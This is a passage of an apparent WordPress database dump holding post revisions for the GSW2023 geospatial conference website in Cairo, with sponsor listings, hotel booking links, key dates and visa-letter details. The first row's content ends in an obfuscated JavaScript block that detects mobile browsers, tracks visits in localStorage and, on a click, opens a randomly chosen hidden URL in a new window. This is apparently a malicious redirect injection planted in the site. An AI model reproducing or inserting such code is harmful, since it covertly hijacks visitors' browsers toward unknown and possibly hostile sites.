|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:25:33','2023-06-13 22:25:33','',3066,'https://gsw2023.com/?p=4687',0,'revision','',0),
(4688,1,'2023-06-13 22:37:51','2023-06-13 22:37:51','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" 